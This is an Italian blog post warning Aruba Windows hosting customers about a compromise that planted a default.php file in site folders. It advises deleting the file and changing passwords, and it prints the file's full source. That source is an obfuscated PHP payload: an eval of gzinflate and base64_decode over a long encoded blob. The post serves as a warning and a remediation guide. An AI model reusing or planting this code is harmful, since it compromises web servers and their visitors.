Avete anche voi un sito su Aruba?
Anche voi non visualizzate più nulla del vostro sito web?
Bene siete stati colpiti da un attacco avvenuto sui server Aruba per gli hosting Windows.
La cosa che non mi riesco a spiegare è perchè nessuno è stato avvisato e soprattutto perchè ARUBA non ha ne avvisato i clienti ne tantomeno risolto il problema sull’hosting.
In poche parole si tratta di un file defaul.php che è stato inserito in ogni cartella del vostro sito web hostato su aruba.
La cosa più immediata da fare è cancellare il file default.php inserito sul vostro hosting.
Ecco il codice sorgente del file:
1: <;?php eval(gzinflate(base64_decode("DZW1rsUIEgX/ZaMZOTCTNj
2: Iz29eQrMzM7K/fl7d0gipVl1c6/FN/7VQN6VH+k6V7SWD/K8p8Lsp//sMnrsy
3: vbszU0QWtx7rHvFAJXBd6nkrT+OFO3WWnZWXtkq/02mWpNuCDARLT/VSCwuRn
4: MYfZoN4in9Z+IEjpwrUtVkarEBlcMG4OSZsU2hUVEoyNcXeeUQHIw53TM9nl0X
5: YAUKJ30v0M4lTy/btZldu8QENe4tR+fHNHmY9FSTMyez/kRauHm2U1UkOjv8ZRuz
6: N1yHpPDe9nseSt9JwyUUUzltDT46fD0ZZz11p4eFEkrX+bquHXaJUdeFO3BAcpV6
7: OD9ijs4OCnnmwKjWl6TViMiJpRaolmTCJ9b717XFrkHNWoj73hWdXyQj/wX5lb
8: PS0dMNxZ9LthsAdvfrZ6L/W5FX8qBKDzv1NrqjjBw6RXEfMaycBL8dG5yBk8WC
9: Pox3aYplOEurajDF1XsqoSbwwDV3M3TwF4LD3P/YJfloi9XQy1EMP6YQ7UdhXX
10: gptzNJMl9E6sP4seQ790BEa6eVXIsSM7jP3RlxdYTZ9TRAQ4T7DBxcCJQEUkr/
11: OhSGmNLLKyDL7mHTIVuJHVnbOBGlm8L6rvsKYQkkPyyqgZ5lhjVhI0OSULeFWk
12: kajmeO58YijUIESCCP2qXvsWmThgvOC34yTsjDMslt1Y20EidLTwFGXl3ucUo1
13: pfcBNEC+clnwXRRm8AcfGNO9BvyiOpwoXDt7Hx9FyBPi6Zldzs9eVsrieK1pfP
14: AFxXum/cNi+20kvZmA+cwqPF1uKNMdqSyXD4DCxjKZVhJ8Khj1xoYUwCQpAk0z
15: 3Qe9RY4o7Lmwh7KlOxQriAJGu4MmaOJ/
16: /sPrd4O/bO8izdeGH8R4vfRAU7xXNls0NRT6qk8gpGX7OSF/QEYv7GUzvhb/nw
17: bhzOghxVfrOYjIDXXlvVhyQ/YDor3zP1tQ0cwfvlP2lkM4PCrd1mgMUBp13aR2
18: JQPP/qE4r+hqiZcy1i7y2SkBuEAY17MA5CQkA2+PMjMAPq87COKn3lSYT8DHcB
19: ig2hD8ba7dIVyrEGG8eoeeYFiFSdaCzq47dQDkKWHiZyaNifhSsNT68IMTdhzV
20: 5nCtC93w0OzLYB8tg9ZL0bAra82YU6Yr0dGXK/C/YsATylxZWJil54CHQueu6R
21: wl2YUkI4gLD3bt9RF1n/cmtO5mQ0FUZRuXDjtTvO1ppXcC6VoN8YYN6KNq2dyG
22: XHY+HcHDMrrkyIUdyDfJFJDuPth6SWI51joy3PI8n06O/B61aVOJS5VAjsw1MZ
23: WKjYq+VfqE/skm44NkZrRTEyIWzmXSR2CLsjkAvsmR7LWXdOg94HnZ4sORr8/u
24: Q6ohi9jIfIRZzDbV+DuZcmzW1rrCYTrz1JQH8QLSeyMFWmHObCsD1f0LxVuz60
25: /bHO19rVfhlxTRdF2mgXhjBiOZJ1sAth137bY3caJq1n9chjhbGpLSweAkzkfg
26: qnH1Zys7HzL8CO4zRJt53wCrac09iaF6scbzWjQHxfxG2qWHKvCd/OL2tUZLTt
27: rRDU8r8Lql19L0xJLIYHuhGKbPnlUIPE0Azl0bzFOot4X/15NgIRekFJDtzDCT
28: JwGX0/+r5enk0Jyqa6aHpWmdbwkh4vsh7RCBzQWwdDuz/Vc2r2KO3THjyRkgh+
29: 2adjhWs23z3sy0/UXk4B93tp0dfwrEqA1jifdCFMBkqPc+qOLs6nAtGKP+QGr
30: kA6BPjruqY0pCG7dmrOzE6FnNO9VswKqUjw6OH6t4CrfczbNts3e80BknpWWP
31: kSrMMp2r/ACZARGjgRLBzsbIGJBeoh3deVD8uwqBc61Dv4d9tapXjTHoyku9G
32: SZ3x2sLhzhFCJqQiVfOem2niFcdDA/EBlroJ4Q807K6CFHWoM4ZukkLDyOCEB
33: I05knbTy9vamQqpNYdH583RkN7RrYmi9SVyGfy+nuRjAtHiAHxASmI6ulaITx
34: O1fe5O8P+sfYUAanhz77Wgt7px4PBawLdZ4M1RAc0/sTpapuYd1/W2AbUbTcH
35: PQAuq8zCm6uznYVZmUza6THWduW6yFuQcE+HrYxNWN+A8E4aKfrqgmithkRZt
36: mizaRyw2yVmDf9Xtvxj1y3+pj8FK2JuHNrPFjHeX3uCHpxLqi6wmjSgYvjRhj
37: bo45kHOWX+dfSx8DnFeF2SL1PYH8PQKCBce+QdpAXEthFgEJkJlY4sNM3xFlm
38: jMK8BQ6biSbNZ40Xlbz3947g2d3FTXv4srcS2qEJoad4iY6uOKBXras+z//FZ
39: y/39C/oi9M884zOOk1QdRnivySYMkif1Z4d/TID+D9Ws2BqPJc9RRyAdirX78
40: +wX09lJn7/40rjNAiCKGqDlPyff//997//Bw=="))); ?>
Dopodichè cambiare le passowrd FTP e di accesso dei vostri siti web.
Mi dispiace dirlo ma aruba che DELUSIONE IMMENSA
Siete stati colpiti anche voi? fatecelo sapere…
.
Pacman
Nostradamus
Magical Cat Adventure
Snake